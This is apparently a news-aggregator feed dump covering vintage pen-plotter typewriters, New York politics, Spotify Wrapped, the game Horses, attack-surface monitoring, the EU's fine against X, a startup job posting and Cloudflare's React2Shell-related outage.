Here’s a video of the Panasonic RK-P400C Penwriter typewriter plotter drawing a design under computer control via RS-232. The
manual is available from Archive.org
.
Mona Triangles on a Panasonic RK-P400C typewriter plotter.
Panasonic RK-P440 Penwriter
A lower-end model was the Panasonic RK-P440 Penwriter. It had a computer input but required the K-100 external interface. Otherwise it was functionally the same: it draws text as well as business graphics with four-color ballpoint pens, and is portable using six C batteries.
The Panasonic K-100 interface box connected to the typewriter via a DE-9 port on the side and connected to your computer via either DB-25 RS-232 or Centronics parallel.
Here’s a video of the Panasonic RK-P440 Penwriter plotting the demo page using four ballpoint pens.
Panasonic RK-P200C Penwriter
Panasonic
also had the basic
RK-P200C Penwriter
which removed any computer control but kept the ability to do standalone business graphics. Pic from eBay.
Silver Reed EB50
There were other ballpoint pen based typewriters, such as this
Silver Reed EB50
. It draws text and business graphics too, but this one has a parallel port so it can act as a plotter. I added support for it to my workflow and it’s very good.
Here’s a video of the Silver Reed Colour PenGraph EB50 plotting Schotter. I’ll admit it’s strange seeing this on something with a keyboard.
Smith Corona
Graphtext 90
Smith Corona
sold the
Graphtext 90
. No computer control. Same pens and also ran on batteries.
Brother
Type-a-Graph BP-30
Not to be left out,
Brother
offered the
Type-a-Graph BP-30
. Pics from eBay; there are usually a lot of these for sale.
Sears
LXI Type-O-Graph
Even
Sears
got into the game with the
LXI Type-O-Graph
(likely a rebranded Brother Type-a-Graph; they look the same). Mine has a flaw in the print head mechanism.
Sharp EL-7050
Calculator
Adding to the oddware with built-in pen plotters, there was even a calculator with a tiny plotter inside. This is the
Sharp EL-7050
calculator with a built-in plotter printer. It could act as a usual printing calculator, but it could also draw graphs and pie charts of data sets.
Here’s a video of the Sharp EL-7050 calculator printing the powers of 2.
And here’s the Sharp EL-7050 calculator plotting the graph.
Music Keyboard
Yamaha added a pen plotter to one of their music keyboards, the Yamaha MP-1. The idea was you’d compose music on the keyboard and it would plot the notes on paper as you played. The reality was that the plotter was much slower than your playing, so it took forever to catch up. It also wasn’t great at quantization, so the notes were likely not what you’d expect.
Built In Plotters
Many small computers in the 1980s also had plotters available like the
Commodore 1520
and the
Atari 1020
. They used 4” wide paper and the same pens.
Some “slabtops” had built in pen plotters like the
Casio PB-700
,
Radio Shack Tandy PC-2
, and
Sharp PC-2500
.
Pens
All of the typewriter models used the same ballpoint pens in four colors (black, red, green, blue), were portable with a built-in handle, and could run on batteries. They also likely all used the same plotter mechanisms, made by Alps.
The pens are rather scarce now; mostly all that remains is NOS (new old stock), with the exception of a couple of German companies that make replacements for medical equipment that happen to fit.
These pen typewriters were sold during the mid 1980s. In PC World magazine July 1985, the Panasonic RK-P400C retailed for $350.
Mamdani’s First 100 Days, Child Care Edition: 'Fixing What Adams Broke'
hellgate
hellgatenyc.com
2025-12-05 15:07:51
Free universal child care is the incoming mayor's biggest promise—here's what he needs to do immediately to make it happen, according to experts....
Zohran Mamdani has an ambitious agenda. What does he need to do immediately during his first 100 days in office to make his promises a reality? And what can his administration do to make life better for New York City residents, right from the jump? Over the next two weeks, Hell Gate will be answering those questions.
First up, a look at his plans for universal free child care.
Zohran Mamdani has consistently
said
that universal, free child care will be his number one priority when he comes into office as mayor. It is the campaign pledge that has garnered the most vocal support from Governor Kathy Hochul. But it’s also the largest and most complicated undertaking he promised, and the one that comes with the
biggest price tag
–a cost that Mamdani will need state support to cover. If he wants to deliver on child care, he'll have to position himself to be ready to get to work as soon as he's in office—and to tackle multiple challenges at once.
The first step, multiple experts and advocates said, will have to be to fix what Eric Adams broke. "You can't build a new system on a broken foundation," said Emmy Liss, an independent early childhood consultant who worked on pre-K and 3K under Bill de Blasio.
I spent hours listening to Sabrina Carpenter this year. So why do I have a Spotify ‘listening age’ of 86?
Guardian
www.theguardian.com
2025-12-05 15:07:00
Many users of the app were shocked, this week, by this addition to the Spotify Wrapped roundup – especially twentysomethings who were judged to be 100 “Age is just a number. So don’t take this personally.” Those words were the first inkling I had that I was about to receive some very bad news. I wok...
“Age is just a number. So don’t take this personally.” Those words were the first inkling I had that I was about to receive some very bad news.
I woke up on Wednesday with a mild hangover after celebrating my 44th birthday. Unfortunately for me, this was the day
Spotify
released “Spotify Wrapped”, its analysis of (in my case) the 4,863 minutes I had spent listening to music on its platform over the past year. And this year, for the first time, they are calculating the “listening age” of all their users.
“Taste like yours can’t be defined,” Spotify’s report informed me, “but let’s try anyway … Your listening age is 86.” The numbers were emblazoned on the screen in big pink letters.
It took a long time for my 13-year-old daughter (listening age: 19) and my 46-year-old husband (listening age: 38) to stop laughing at me. Where did I go wrong, I wondered, feeling far older than 44.
But it seems I’m not alone. “Raise your hand if you felt personally victimised by your Spotify Wrapped listening age,”
wrote one user
on X. Another
post
, with a brutal clip of Judi Dench shouting “you’re not young” at Cate Blanchett, was liked more than 26,000 times. The 22-year-old actor Louis Partridge best mirrored my reaction when he shared his listening age of 100 on Instagram stories with the caption: “uhhh”.
“Rage bait” – defined as “online content deliberately designed to elicit anger or outrage” in order to increase web traffic – is the Oxford English Dictionary’s word of the year. And to me, that cheeky little message from Spotify, warning me not to take my personalised assessment of my personal listening habits personally, seemed a prime example.
“How could I have a listening age of 86?” I raged to my family and friends, when the artist I listened to the most this year was 26-year-old Sabrina Carpenter? Since I took my daughter to Carpenter’s concert at Hyde Park this summer, I have spent 722 minutes listening to her songs, making me “a top 3% global fan”.
The only explanation Spotify gave for my listening age of 86 was that I was “into music of the late 50s” this year. But my top 10 most-listened to songs were all released in the past five years and my top five artists included Olivia Dean and Chappell Roan (who released their debut albums in 2023).
Admittedly, Ella Fitzgerald is in there too. But her music is timeless, I raged; surely everyone listens to Ella Fitzgerald? “I don’t,” my daughter said, helpfully. “I don’t,” added my husband.
It’s also true that I occasionally listen to folk music from the 50s and 60s – legends such as Pete Seeger, Bob Dylan and Joan Baez. But when I analysed my top 50 “most listened to” songs, almost all of them (80%) were released in the last five years.
What’s particularly enraging is that Spotify knows my taste is best described as “eclectic” – because that’s how Spotify has described it to me. I have apparently listened to 409 artists in 210 music genres over the past year.
None of it makes sense, until you see the extent to which inciting rage in users like me is paying off for Spotify: in the first 24 hours, this year’s Wrapped campaign had
500 million
shares on social media, a 41% increase on last year.
According to Spotify, listening ages are based on the idea of a “reminiscence bump”, which they describe as “the tendency to feel most connected to the music from your younger years”. To figure this out, they looked at the release dates of all the songs I played this year, identified the five-year span of music that I engaged with more than other listeners my age and “playfully” hypothesised that I am the same age as someone who engaged with that music in their formative years.
In other words, no matter how old you are, the more unusual and idiosyncratic and out of step your musical taste is compared with your peers, the more likely it is that Spotify will poke fun at some of the music you enjoy listening to.
But now that I understand this, rather than rising to the bait, I know exactly what to do. I walk over to my dusty, ancient CD player. I insert an old CD I bought when I was a teenager. I turn the volume up to max. And then I play one of my favourite songs, a classic song that everyone who has a listening age of 86 or over will know, like I do, off by heart: You Make Me Feel So Young by Ella Fitzgerald.
Horror game Horses has been banned from sale – but is it as controversial as you’d think?
Guardian
www.theguardian.com
2025-12-05 15:04:14
Pulled by Steam and Epic Games Store, indie horror Horses shook up the industry before it was even released. Now it’s out, all the drama surrounding it seems superfluous On 25 November, award-winning Italian developer Santa Ragione, responsible for acclaimed titles such as MirrorMoon EP and Saturnal...
On 25 November, award-winning Italian developer Santa Ragione, responsible for acclaimed titles such as MirrorMoon EP and Saturnalia,
revealed that its latest project, Horses
, had been banned from Steam - the largest digital store for PC games. A week later, another popular storefront, Epic Games Store, also pulled Horses, right before its 2 December launch date. The game was also briefly removed from the Humble Store, but was reinstated a day later.
The controversy has helped the game rocket to the top of the digital stores that are selling it, namely itch.io and GOG. But the question remains – why was it banned? Horses certainly delves into some intensely controversial topics (a content warning at the start details, “physical violence, psychological abuse, gory imagery, depiction of slavery, physical and psychological torture, domestic abuse, sexual assault, suicide, and misogyny”) and is upsetting and unnerving.
Controversial … Horses.
Photograph: Santa Ragione
The plot is fairly simple, though it turns dark fast. You play as Anselmo, a 20-year-old Italian man sent to spend the summer working on a farm to build character. It’s revealed almost immediately (so fast in fact, that I let out a surprised “Ha!”) that the farm Anselmo has been sent to is not a normal one. The “horses” held there are not actually horses, but nude humans wearing horse heads that appear to be permanently affixed.
Your job is to tend to the garden, the “horses” and the “dog” (who is a human wearing a dog head). Anselmo performs menial, frustratingly slow everyday tasks across Horses’ three-ish hour runtime, like chopping wood and picking vegetables. These monotonous tasks are, however, interspersed with horrible and unsettling jobs. On day one, you find a “horse” body hanging from a tree and have to help the farmer bury it.
It’s disturbing, yes, but Horses doesn’t show most of these horrors playing out, and when it does, the simplistic, crude graphics dull its edges (when you encounter the farmer whipping a human “horse” and have to throw hydrogen peroxide on her back, the marks crisscrossing her skin are blurry and unreal).
Unsettling … Horses.
Photograph: Santa Ragione
The “horses’” genitals and breasts are blurred out. The enslaved are forbidden from fornicating, but you’ll find that they do that anyway (a simplistic, animalistic depiction of sex), and though you’re forced to “tame” them by putting them back in their pen, it’s just a button press to interact, with no indication of what you’ve actually done to them.
Valve, the company that owns Steam,
told PC Gamer
that Horses’ content was reviewed back in 2023. “After our team played through the build and reviewed the content, we gave the developer feedback about why we couldn’t ship the game on Steam, consistent with our onboarding rules and guidelines,” the statement read. “A short while later the developer asked us to reconsider the review, and our internal content review team discussed that extensively and communicated to the developer our final decision that we were not going to ship the game on Steam.”
According to
IGN
, Epic Games Store told developer Santa Ragione: “We are unable to distribute Horses on the Epic Games Store because our review found violations of the Epic Games Store Content Guidelines, specifically the ‘Inappropriate Content’ and ‘Hateful or Abusive Content’ policies.” Santa Ragione alleges that “no specifics on what content was at issue were provided.”
Horses’ gameplay is grotesque, not gratuitous. The horror is psychological and lies in the incongruity of performing menial tasks in a veritable hellscape, while having no idea why any of this is going on. There is barely any sound aside from the constant whirring of a film camera (the game is presented like a mostly silent Italian arthouse film), super-up-close shots of mouths moving as they talk or chew, unsettling character models, the occasional cut to a real-life shot of water pouring in a glass or slop filling up a dog bowl.
There is no explicit gore or violence. You are uncomfortable, frustrated and unnerved throughout, and the horrors of humanity are on full display, but nothing ever threatens to upend your lunch. It is an interesting meditation on violence and power dynamics, but it is by no means a shocking or radical game. The conversation that has ignited around it – about video games as art and the censorship of art – is proving to be more profound than the actual content of the game.
A Practical Guide to Continuous Attack Surface Visibility
Bleeping Computer
www.bleepingcomputer.com
2025-12-05 15:00:10
Passive scan data goes stale fast as cloud assets shift daily, leaving teams blind to real exposures. Sprocket Security shows how continuous, automated recon gives accurate, up-to-date attack surface visibility. [...]...
AUTHOR: Topher Lyons, Solutions Engineer at Sprocket Security
The Limits of Passive Internet-Scan Data
Most organizations are familiar with the traditional approach to external visibility: rely on passive internet-scan data, subscription-based datasets, or occasional point-in-time reconnaissance to understand what they have facing the public internet. These sources are typically delivered as static snapshots: lists of assets, open ports, or exposures observed during a periodic scan cycle.
While useful for broad trend awareness, passive datasets are often misunderstood. Many security teams assume they provide a complete picture of everything attackers can see. But in today’s highly dynamic infrastructure, passive data ages quickly.
Cloud footprints shift by the day, development teams deploy new services continuously, and misconfigurations appear (and disappear) far faster than passive scans can keep up.
As a result, organizations relying solely on passive data often make decisions based on stale or incomplete information.
To maintain an accurate, defensive view of the external attack surface, teams need something different: continuous, automated, active reconnaissance that verifies what’s actually exposed every day.
Today’s Attack Surface: Fast-Moving, Fragmented, and Hard to Track
Attack surfaces used to be relatively static. A perimeter firewall, a few public-facing servers, and a DNS zone or two made discovery manageable. But modern infrastructure has changed everything.
Cloud adoption has decentralized hosting, pushing assets across multiple providers and regions.
Rapid deployment cycles introduce new services, containers, or endpoints.
Asset sprawl grows quietly as teams experiment, test, or automate.
Shadow IT emerges from marketing campaigns, SaaS tools, vendor-hosted environments, and unmanaged subdomains.
Even seemingly insignificant changes can create material exposure. A DNS record that points to the wrong host, an expired TLS certificate, or a forgotten dev instance can all introduce risk. And because these changes occur constantly, visibility that isn’t refreshed continuously will always fall out of sync with reality.
If the attack surface changes daily, then visibility must match that cadence.
Why Passive Data Fails Modern Security Teams
Stale Findings
Passive scan data becomes outdated quickly. An exposed service may disappear before a team even sees the report, while new exposures emerge that weren’t captured at all. This leads to a common cycle where security teams spend time chasing issues that no longer exist while missing the ones that matter today.
Context Gaps
Passive datasets tend to be shallow. They often lack:
Ownership
Attribution
Root-cause detail
Impact context
Environmental awareness
Without context, teams can’t prioritize effectively. A minor informational issue may look identical to a severe exposure.
Missed Ephemeral Assets
Modern infrastructure is full of short-lived components. Temporary testing services, auto-scaled cloud nodes, and misconfigured trial environments might live for only minutes or hours. Because passive scans are periodic, these fleeting assets often never appear in the dataset, yet attackers routinely find and exploit them.
Duplicate or Irrelevant Artifacts
Passive data commonly includes leftover DNS records, reassigned IP space, or historical entries that no longer reflect the environment. Teams must manually separate false positives from real issues, increasing alert fatigue and wasting time.
Continuous Reconnaissance: What It Is (and Isn’t)
Automated, Active Daily Checks
Continuous visibility relies on recurring, controlled reconnaissance that automatically verifies external exposure. This includes:
Detecting newly exposed services
Tracking DNS, certificate, and hosting changes
Identifying new reachable hosts
Classifying new or unknown assets
Validating current exposure and configuration state
This is not exploitation or intrusive action. It’s safe, automated enumeration built for defense.
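As a rough sketch of what such a daily check might look like (my own illustration, not Sprocket's actual tooling), the following Python script uses only the standard library to confirm that a small, assumed inventory of hosts still resolves, which common ports answer, and how long their TLS certificates have left. The hostnames, ports, and timeouts are placeholders.

# Rough sketch of a daily, non-intrusive external check.
# Hostnames and ports below are hypothetical placeholders.
import socket
import ssl
from datetime import datetime

HOSTS = ["app.example.com", "staging.example.com"]   # assumed asset inventory
PORTS = [22, 80, 443, 3389]                          # common exposure points

def resolve(host):
    try:
        return socket.gethostbyname(host)
    except socket.gaierror:
        return None

def port_open(ip, port, timeout=2):
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.settimeout(timeout)
        return s.connect_ex((ip, port)) == 0

def cert_days_left(host, port=443, timeout=3):
    ctx = ssl.create_default_context()
    with socket.create_connection((host, port), timeout=timeout) as sock:
        with ctx.wrap_socket(sock, server_hostname=host) as tls:
            not_after = tls.getpeercert()["notAfter"]
    expires = datetime.strptime(not_after, "%b %d %H:%M:%S %Y %Z")
    return (expires - datetime.utcnow()).days

for host in HOSTS:
    ip = resolve(host)
    if ip is None:
        print(f"{host}: no longer resolves (possible dangling DNS record)")
        continue
    open_ports = [p for p in PORTS if port_open(ip, p)]
    print(f"{host} ({ip}): open ports {open_ports}")
    if 443 in open_ports:
        try:
            print(f"  TLS certificate expires in {cert_days_left(host)} days")
        except Exception as err:
            print(f"  TLS check failed: {err}")

In practice a check like this would run on a schedule, and its output would be diffed against the previous day's results to surface new exposures.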
Environment-Aware Discovery
As infrastructure shifts, continuous recon shifts with it. New cloud regions, new subdomains, or new testing environments naturally enter and exit the attack surface. Continuous visibility keeps pace automatically with no manual refresh required.
What Continuous Visibility Reveals (That Passive Data Can’t)
Newly Exposed Services
These exposures often appear suddenly and unintentionally:
A forgotten staging server coming online
A developer opening RDP or SSH for testing
A newly created S3 bucket left public
Daily verification catches these before attackers do.
Misconfigurations Introduced During Deployments
Rapid deployments introduce subtle errors:
Certificates misapplied or expired
Default configurations restored
Ports opened unexpectedly
Daily visibility surfaces them immediately.
Shadow IT and Rogue Assets
Not every externally exposed asset originates from engineering. Marketing microsites, vendor-hosted services, third-party landing pages, and unmanaged SaaS instances often fall outside traditional inventories, yet remain publicly reachable.
Real-Time Validation
Continuous recon ensures findings reflect today’s attack surface. This dramatically reduces wasted effort and improves decision-making.
Turning Reconnaissance into Decision Making
Prioritization Through Verification
When findings are validated and current, security teams can confidently determine which exposures pose the most immediate risk.
Triage Without Hunting Through Noise
Continuous recon removes stale, duplicated, or irrelevant findings before they ever reach an analyst’s queue.
Clear Ownership Paths
Accurate attribution helps teams route issues to the correct internal group, like engineering, cloud, networking, marketing, or a specific application team.
Reduced Alert Fatigue
Security teams stay focused on real, actionable issues rather than wading through thousands of unverified scan entries.
How Sprocket Security Approaches ASM
Sprocket’s ASM Community Edition Dashboard
Daily Reconnaissance at Scale
Sprocket Security
performs automated, continuous checks across your entire external footprint. Exposures are discovered and validated as they appear, whether they persist for hours or minutes.
Actionable Findings
Through our ASM framework, each finding is classified, verified, attributed, and prioritized. This ensures clarity, context, and impact without overwhelming volume.
Removing Guesswork from ASM
A validated, contextualized finding tells teams:
What changed
Why it matters
How severe it is
Who owns it
What action to take
Compared to raw scan data, this eliminates ambiguity and reduces the time it takes to resolve issues.
Getting a Handle on Your Attack Surface
So how can organizations ensure thorough, continuous monitoring of their attack surface?
Today’s attack surfaces evolve constantly. Static, passive datasets simply cannot keep up. To stay ahead of emerging exposures and prevent easily avoidable incidents, security teams need continuous, automated reconnaissance that reflects the real state of their environment.
Relying solely on passive data creates blind spots. Continuous visibility closes them. As organizations modernize their infrastructure and accelerate deployment cycles, continuous reconnaissance becomes the foundation of attack surface hygiene, prioritization, and real-world risk reduction.
The European Commission has fined X €120 million ($140 million) for violating transparency obligations under the Digital Services Act (DSA).
This is the first non-compliance ruling under the DSA, a
set of rules adopted in 2022
that requires platforms to remove harmful content and protect users across the European Union.
The fine was issued following a two-year investigation into the platform formerly known as Twitter to determine whether the social network violated the DSA regarding the effectiveness of measures to combat information manipulation and the dissemination of illegal content. The commission's preliminary findings were
shared with X
in July 2024.
Regulators found that X had
breached transparency requirements
through its misleading 'blue checkmark' system for 'verified accounts,' its opaque advertising database, and its blocking of researchers' access to public data.
The commission said that X's checkmark misleads users because accounts can purchase the badge without meaningful identity verification. This deceptive design also makes it challenging to assess account authenticity, increasing exposure to fraud and manipulation.
"This deception exposes users to scams, including impersonation frauds, as well as other forms of manipulation by malicious actors," the commission noted. "While the DSA does not mandate user verification, it clearly prohibits online platforms from falsely claiming that users have been verified, when no such verification took place."
X also failed to maintain a transparent advertising repository, as the platform's ad database lacks the accessibility features mandated by the DSA and imposes excessive processing delays that hinder efforts to detect scams, false advertising, and coordinated influence campaigns. It also set up unnecessary barriers that block researchers from accessing public platform data needed to study systemic risks facing European users.
"Deceiving users with blue checkmarks, obscuring information on ads and shutting out researchers have no place online in the EU. The DSA protects users. The DSA gives researchers the way to uncover potential threats," said Henna Virkkunen, the bloc's executive vice president for tech sovereignty.
"The DSA restores trust in the online environment. With the DSA's first non-compliance decision, we are holding X responsible for undermining users' rights and evading accountability."
The commission said that X now has 60 working days to address the blue checkmark violations and 90 days to submit action plans for fixing the research access and advertising issues, and added that failure to comply could trigger additional periodic penalties.
[$] Eventual Rust in CPython
Linux Weekly News
lwn.net
2025-12-05 14:33:09
Emma Smith and Kirill Podoprigora, two of Python's core developers, have
opened a
discussion about including Rust code in CPython, the reference implementation of
the Python programming language. Initially, Rust would only be used for optional
extension modules, but they would like to see Rust beco...
It'll Be Left Vs. Left for Nydia Velázquez's Open Seat
The Hell Gate Podcast is the best way to start your freezing weekend! A fresh episode will drop later today. Listen
here
, or wherever you get your podcasts
In congressional districts around the city, primary battles are shaping up, pitting moderates against the left. Then there's Representative Nydia Velázquez's Brooklyn and Queens district, where the fight will be…left vs. further left.
The district lies at the heart of the "Commie Corridor," encompassing neighborhoods including Williamsburg, Greenpoint, Ridgewood, and Bushwick. Velázquez announced last month that she would step down, taking the city's political class by surprise because in Congress, bowing out at the age of 72 is considered early retirement.
Brooklyn Borough President Antonio Reynoso
kicked off his campaign
for the seat on Thursday, the first candidate to formally enter the race. The Democratic Socialists of America are expected to put up their own candidate and make a strong play for the district, which is one of their best shots to pick up a congressional seat next year.
"The fight must continue. And I'm ready to step up," Reynoso said in a
launch video
, filmed mostly in Spanish on the south side of Williamsburg where he grew up.
Reynoso is firmly in the progressive wing of the Democratic Party, but not a DSA member.
Emerge Career’s mission is to break the cycle of poverty and incarceration. We’re not just building software; we’re creating pathways to real second chances. Through an all-in-one platform deeply embedded within the criminal justice system, we recruit, train, and place justice-impacted individuals into life-changing careers.
Our vision is to become the country’s unified workforce development system, replacing disconnected brick-and-mortar job centers with one integrated, tech-powered solution that meets low-income individuals exactly where they are. Today, the federal government spends billions annually on education and training programs, yet only about 70% of participants graduate, just 38.6% secure training-related employment, and average first-year earnings hover around $34,708.
By contrast, our seven-person team has already outperformed the job centers in two entire states (Vermont and South Dakota) in just the past year. With an 89% graduation rate and 92% of graduates securing training-related employment, our alumni aren’t just getting jobs—they’re launching new lives with average first-year earnings of $77,352. The results speak for themselves, and we’re just getting started.
Before Emerge, our founders
Zo
and
Gabe
co-founded Ameelio,
an award-winning tech nonprofit
that is dismantling the prison communication duopoly.
Backed by tech luminaries
like Reid Hoffman, Vinod Khosla, and Jack Dorsey, and by major criminal-justice philanthropies such as Arnold Ventures and the Mellon Foundation, Ameelio became a recognized leader in the space. Because of this experience, both Zo and Gabe understood what it took to create change from within the system. After serving over 1M people impacted by incarceration, they witnessed firsthand the gap in second-chance opportunities and the chronic unemployment plaguing those impacted by the justice system. Emerge Career is committed to solving this issue.
Our students are at the heart of our work. Their journeys have captured national attention on
CBS
,
NBC
, and in
The Boston Globe
, and our programs now serve entire
states
and
cities
. And we’re not doing it alone: our vision has attracted support from Alexis Ohanian (776), Michael Seibel, Y Combinator, the Opportunity Fund, and public figures like Diana Taurasi, Deandre Ayton, and Marshawn Lynch. All of us believe that, with the right mix of technology and hands-on practice, we can redefine workforce development and deliver true second chances at scale.
We call this a
Founding Design Engineer
role—even three years in and with multiple contracts under our belt—for two reasons. First, you’ll be our very first engineer, joining our co-founder, who’s built the entire platform solo to date. Second, our growth is now outpacing our systems, and we can’t keep up on maintenance alone. We’re at a critical juncture: we can either hire someone to simply care for what exists, or we can bring on a talent who believes that, with the right blend of technology and hands-on practice, we can unify the workforce-development system and deliver second chances at true scale. We hope that can be you.
This is not a traditional engineering job. You’ll do high-impact technical work, but just as often you’ll be on the phone with a student, writing documentation, debugging support issues, or figuring out how to turn a one-off solution into a repeatable system. You’ll ship features, talk to users, and fix what’s broken, whether that’s in the product or in the process. You’ll build things that matter, not just things that are asked for.
This role blends engineering, product, support, and program operations. We’re looking for someone who is energized by ownership, obsessed with user outcomes, and excited to work across domains to make things better. If you’re the kind of person who wants to be hands-on with everything—students, code, strategy, and execution—you’ll thrive here.
Who You Are:
You love supporting other people’s growth.
This role will feel like case work at times, and you’re drawn to that. You’ve dedicated your life to volunteering, working in social impact, or finding ways to make the playing field more fair. You find joy in helping others rise. You don’t hesitate to call, text, or meet with a student who needs you. You show up consistently, personally, and with heart.
You believe everyone deserves a second chance.
You treat everyone with dignity. You know how to meet people exactly where they are, with empathy and compassion, helping create a space where everyone feels seen and valued, regardless of their background.
You identify yourself as a cracked engineer.
You love finding a way or making one. You take extreme ownership of ideas, driving them to completion even when others need convincing. Every time you hit a wall, you think of three new ways to solve the issue.
You are tech-forward, but not tech-first.
You look for ways to automate and scale, but you know not everything should be automated. You believe that with the right builder mindset, one coach can support hundreds of individuals—but you also understand that in a program like ours, many moments require a human touch. You know when to hand it to a system, and when to pick up the phone.
You are entrepreneurial.
You’re scrappy, resourceful, autonomous, and low-maintenance. You know process matters—but at this stage, speed and iteration matter more. You’re comfortable building quickly and changing procedures often to get to the right solution. You roll up your sleeves and solve problems. No job is too small.
You play to win.
You stay optimistic when things get tough and keep moving when others slow down. You’re not rattled by change or new ideas. You don’t need to agree with everything, but you bring a “yes, and” mindset that helps ideas grow instead of shutting them down.
You work hard
. You show up early, stay late, and do what needs to get done—no ego, no excuses. You don’t wait around or ask for permission. This isn’t a 9-to-5. The team puts in 10+ hour days because we care about the mission and each other. If that sounds miserable, this isn’t for you. If it sounds exciting, you’ll fit right in.
You are a straight shooter.
You don’t shy away from hard conversations—internally or externally. You bring clarity, care, and accountability to every interaction.
You love learning.
You understand that recent advancements in AI have shifted the way we work and what it means to be a high performer. You tinker with new tools. You enjoy being an early adopter. You’re always rethinking and optimizing how you work so you can keep leveling up. Nobody needs to tell you to keep upping your game.
You have an eye for operational detail.
This doesn’t mean you’re simply organized. At Emerge, operational excellence isn’t just about efficiency—it’s about protecting the real lives and futures of the people in our programs. You have an almost paranoid attention to detail, because you understand that even small oversights have real, human consequences.
You are a clear writer.
This doesn’t mean you need to craft the next great novel, but you must communicate ideas simply and clearly. You value precision, clarity, and brevity. You understand that good writing reduces confusion, accelerates decisions, and ensures everyone stays aligned, especially in high-stakes environments like ours.
You are a strong prompter.
You’ve seen firsthand how a few thoughtful prompts can transform messy tasks into scalable, repeatable AI workflows. You love tinkering with prompts, contexts, and configurations to get exactly the right outputs, and you take pride in turning cutting-edge AI into practical processes that anyone can use.
Requirements
Willing to relocate and work in-person in New York City
Experience taking a project from 0 to 1. You might have led a project, been a founder previously, built an impressive side project, or been one of the first 10 employees at an early stage startup
You love working with React and Typescript
Experience with Figma
Experience collaborating with operations or support teams
Bonus Points
Experience in ed-tech
Experience with UX research
What you will be doing
Coaching students.
You’ll support students throughout their training journey—not just by building tools, but by directly engaging with them. This means texting, calling, and helping students one-on-one when needed. At the same time, you’ll take what you learn from those interactions and turn it into scalable systems and smart automations. You’ll be doing both engineering and non-engineering work to make sure students succeed and the product keeps improving.
Talking to students.
Good founding engineers read feedback and iterate quickly. Great founding engineers have users they're friendly with, talk with them frequently, bounce ideas off them, and iterate with them when they ship new things.
Doing support
. This is an engineering role with key program management responsibilities. You’ll work directly with students every day. That requires patience, empathy, and a willingness to meet people where they are. You’ll help investigate and resolve product issues, and you’ll take ownership of making the product better through what you learn.
Documenting your work and its impact.
Our work is complex, spans months, and involves multiple teams. Clear documentation and communication are critical. You’ll be responsible for creating awareness when a change impacts operations, and for helping others understand how features affect different parts of training and service delivery. Precision matters.
Owning products and features end to end
. You won’t just take tickets. You’ll originate ideas based on user conversations, your own instincts, and our larger strategy. You’ll test MVPs in production, iterate based on real feedback, and stay accountable to the long-term success of your work. We build in React and TypeScript. If you like shipping for the sake of it, this role isn’t for you. If you like shipping with purpose and ownership, you’ll love it here.
Implementing AI features and operational workflows
. This is last for a reason. We don’t jump to automation. We do things manually first to fully understand the problem—then we build. If you care about applying AI meaningfully, not just for hype, this is the right place.
Cultural fit conversation & technical screen (60 min)
Getting to know you interview (60 min):
A more in-depth discussion about your background, experiences, and goals.
Reference checks.
We will select 3–4 people you’ve worked with and request introductions. We will request these when the time comes. We’re looking for honest and raw references, not flawless ones.
Paid Work Trial (2-5 days).
You’ll come onsite to work on a real project, with access to internal tools and team collaboration. You’ll be paid $500 per day. All travel expenses will be covered.
About Emerge Career
Founded: 2022
Batch: S22
Team Size: 3
Status: Active
Cloudflare blames today's outage on emergency React2Shell patch
Bleeping Computer
www.bleepingcomputer.com
2025-12-05 13:53:26
Cloudflare has blamed today's outage on the emergency patching of a critical React remote code execution vulnerability, which is now actively exploited in attacks. [...]...
In a status page update, the internet infrastructure company has now blamed the incident on an emergency patch designed to address a critical remote code execution vulnerability in React Server Components, which is now actively exploited in attacks.
"A change made to how Cloudflare's Web Application Firewall parses requests caused Cloudflare's network to be unavailable for several minutes this morning,"
Cloudflare said
.
"This was not an attack; the change was deployed by our team to help mitigate the industry-wide vulnerability disclosed this week in React Server Components. We will share more information as we have it today."
Tracked as
CVE-2025-55182
, this maximum severity security flaw (dubbed React2Shell) affects the React open-source JavaScript library for web and native user interfaces, as well as dependent React frameworks such as Next.js, React Router, Waku, @parcel/rsc, @vitejs/plugin-rsc, and RedwoodSDK.
The vulnerability was found in the React Server Components (RSC) 'Flight' protocol, and it allows unauthenticated attackers to gain remote code execution in React and Next.js applications by sending maliciously crafted HTTP requests to React Server Function endpoints.
While multiple React packages in their default configuration (i.e., react-server-dom-parcel, react-server-dom-turbopack, and react-server-dom-webpack) are vulnerable, the flaw only affects React versions 19.0, 19.1.0, 19.1.1, and 19.2.0 released during the past year.
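For teams triaging their own exposure, the affected-version list above can be checked mechanically. The sketch below is a hypothetical helper, not part of the React advisory or any vendor tooling: it reads a project's package.json and flags a pinned react dependency that matches one of the listed versions. It does not resolve semver ranges or transitive dependencies, so the lockfile should still be checked.

# Hypothetical triage helper: flag a package.json that pins React to one of
# the versions reported as affected by CVE-2025-55182 (React2Shell).
import json
import sys

AFFECTED = {"19.0", "19.0.0", "19.1.0", "19.1.1", "19.2.0"}  # versions listed above

def check(path):
    with open(path) as fh:
        pkg = json.load(fh)
    deps = {**pkg.get("dependencies", {}), **pkg.get("devDependencies", {})}
    version = deps.get("react", "").lstrip("^~=v ")
    if version in AFFECTED:
        print(f"{path}: react {version} is on the affected list - update or apply mitigations")
    else:
        print(f"{path}: react '{version or 'not found'}' is not an exact match; "
              "check the lockfile for the resolved version")

if __name__ == "__main__":
    for path in sys.argv[1:] or ["package.json"]:
        check(path)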
Ongoing React2Shell exploitation
Although the impact is not as widespread as initially believed, security researchers with Amazon Web Services (AWS) have reported that multiple China-linked hacking groups (including Earth Lamia and Jackpot Panda)
have begun exploiting the React2Shell vulnerability
hours after the max-severity flaw was disclosed.
Last month, Cloudflare experienced
another worldwide outage
that brought down the company's Global Network for almost 6 hours, an incident described by CEO Matthew Prince as the "worst outage since 2019."
Cloudflare
fixed another massive outage
in June, which caused Access authentication failures and Zero Trust WARP connectivity issues across multiple regions, and also impacted Google Cloud's infrastructure.
"Alejandro Was Murdered": Colombian Fisherman's Family Files Claim Against U.S. over Boat Strike
Democracy Now!
www.democracynow.org
2025-12-05 13:51:34
The U.S. military said Thursday that it blew up another boat of suspected drug smugglers, this time killing four people in the eastern Pacific. The U.S. has now killed at least 87 people in 22 strikes since September. The U.S. has not provided proof as to the vessels’ activities or the identit...
